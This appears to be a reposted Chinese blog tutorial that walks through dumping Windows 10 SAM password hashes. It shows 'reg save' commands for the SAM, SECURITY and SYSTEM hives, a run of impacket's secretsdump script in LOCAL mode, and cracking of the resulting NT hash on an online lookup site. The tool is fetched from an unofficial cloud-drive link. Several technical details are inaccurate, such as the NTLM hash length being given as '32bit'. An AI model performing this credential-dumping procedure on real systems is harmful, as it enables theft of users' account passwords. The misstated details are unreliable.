前言
严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。
正文
本文讲解如何将windows10里的SAM文件提取出来hash值的破解
用到工具和网站有secretsdumps.py
MD5免费在线解密破解_MD5在线加密-SOMD5
SAM简介
SAM(安全账户管理器),SAM存放在注册表中,SAM用来存储Windows操作系统密码的数据库文件,为了避免明文密码泄露,SAM文件中保存的是明文密码经过一系列算法处理过的Hash值,被保存的Hash分为LM Hash(已废弃)和NTLMHash(长度32bit由字母数字组成),现在用户凭证是以NTLM HASH形式保存。在用户在本地或者远程登陆系统时,会将Hash值与SAM文件中保存的Hash值进行对比。在后期的Windows系统中,SAM文件中被保存的密码Hash都被密钥SYSKEY加密,接下来将对sam进行利用。
reg save hklm\sam C:\sam.save
reg save hklm\security C:\security.save
reg save hklm\system C:\system.save
下载secretsdumps.py
secretsdum下载地址:
链接:https://pan.baidu.com/s/1gCkf9Dwh8xLd4qQQ71Zxwg
提取码:6666
下载后需要安装impacket模块
pip install impacket
安装完成后讲提取出来的三个文件和secretsdumps.py放在一个文件夹内,打开cmd进入该文件夹后输入下列命令
python secretsdumps.py -sam sam.save -security security.save -system system.save LOCAL
hash值就得到了
其中我们拿第一行举例
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
//其中
Administrator //用户名
500 //用户rid
aad3b435b51404eeaad3b435b51404ee //lmhash(老加密算法)
31d6cfe0d16ae931b73c59d7e0c089c0 //nthash(新加密算法,win10以后的电脑使用)
LMHash(LAN Manager Hash)是早期Windows系统中使用的哈希算法,用于存储用户密码的散列值。它将密码分成两个7个字符的部分,并对每个部分进行独立的哈希计算,最终组合成一个16个字符的哈希值。然而,由于其较低的安全性和易受攻击的特点,LMHash在现代环境中已经不推荐使用。
NTHash(NT LAN Manager Hash)是Windows NT及其后续版本中使用的更强大和安全的哈希算法。它使用的是NTLM协议,并将用户密码哈希为一个128位的散列值,称为NTLM哈希。NTLMHash提供了更好的安全性和更大的密码空间,因此在现代Windows系统中被广泛使用。
直接用网页破解
得到未加密原值文章来源:https://www.toymoban.com/news/detail-688548.html
参考文章:奇安信攻防社区-内网渗透-获取明文和hash (butian.net)文章来源地址https://www.toymoban.com/news/detail-688548.html
到了这里,关于win10提取并解密sam文件中的hash值的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!